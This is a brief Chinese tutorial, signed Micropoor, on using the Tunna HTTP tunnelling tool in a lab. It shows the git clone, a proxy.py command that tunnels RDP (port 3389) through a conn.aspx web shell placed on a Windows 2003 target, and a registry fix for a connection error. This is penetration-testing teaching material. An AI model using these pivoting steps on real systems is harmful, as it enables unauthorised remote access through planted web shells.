Tunna简介:
Tunna1.1 是 secforce 在2014年11月出品的一款基于HTTP隧道工具。其中v1.1中支持了SOCKS4a。
Tunna演示稿:
https://drive.google.com/open?id=1PpB8_ks93isCaQMEUFf_cNvbDsBcsWzE
Github:
https://github.com/SECFORCE/Tunna
攻击机:
192.168.1.5 Debian
192.168.1.4 Windows 7
靶机:
192.168.1.119 Windows 2003
安装:
root@John:~# git clone https://github.com/SECFORCE/Tunna.git
Cloning into 'Tunna'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 156 (delta 0), reused 2 (delta 0), pack‐reused 150
Receiving objects: 100% (156/156), 8.93 MiB | 25.00 KiB/s, done.
Resolving deltas: 100% (84/84), done.
靶机执行:
以aspx为demo。
攻击机执行:
python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v
附录:
解决:General Exception: [Errno 104] Connection reset by peer
[+] Spawning keep‐alive thread
[‐] Keep‐alive thread not required
[+] Checking for proxy: False
连接后,出现
General Exception: [Errno 104] Connection reset by peer
等待出现:无法验证此远程计算机的身份,是否仍要连接?
再次运行,在点击是(Y)
python proxy.py ‐u http://192.168.1.119/conn.aspx ‐l 1234 ‐r 3389 ‐s ‐ v
如果:没有出现“无法验证此远程计算机的身份,是否仍要连接?”
注册表键值:
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
删除对应IP键值即可。
非常遗憾的是,Tunna对PHP的支持并不是太友好。
Micropoor